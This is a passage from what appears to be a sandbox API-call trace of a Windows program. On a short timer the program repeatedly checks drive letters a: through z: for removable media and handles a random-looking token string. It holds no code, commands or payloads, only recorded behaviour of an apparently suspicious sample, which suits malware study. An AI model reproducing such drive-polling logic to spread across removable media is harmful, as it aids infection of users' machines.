returned 1 [0215.842] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.842] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.842] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0215.842] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.842] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.842] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.843] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.843] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.843] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.843] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.843] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.843] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.844] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.844] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.844] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.844] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.844] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.845] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.845] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.845] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.845] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.845] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.846] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.846] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.846] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.846] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.847] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.847] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.847] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.847] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.847] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.848] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.848] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.848] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.848] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.848] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.848] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.848] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.849] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.849] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0215.849] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.849] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0215.849] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0215.849] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.849] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.849] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.850] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.850] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.850] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.851] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.851] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.851] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.851] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.851] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.852] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.852] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.852] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.852] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.852] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.853] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.853] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.853] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.853] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.853] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.854] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.854] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.854] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.854] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.854] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.855] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.855] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.861] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.862] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.862] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.862] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.862] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.863] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.863] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.863] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.863] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.863] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0215.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0215.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.865] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.865] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.865] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0215.865] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.866] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.866] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.866] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.866] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.866] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.866] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.867] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.867] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.867] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.867] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.868] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.868] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.868] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.868] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.868] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.868] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.869] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.869] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.869] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.869] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.869] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.870] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.870] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.870] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.870] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.870] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.871] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.871] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0215.872] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0215.872] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.872] 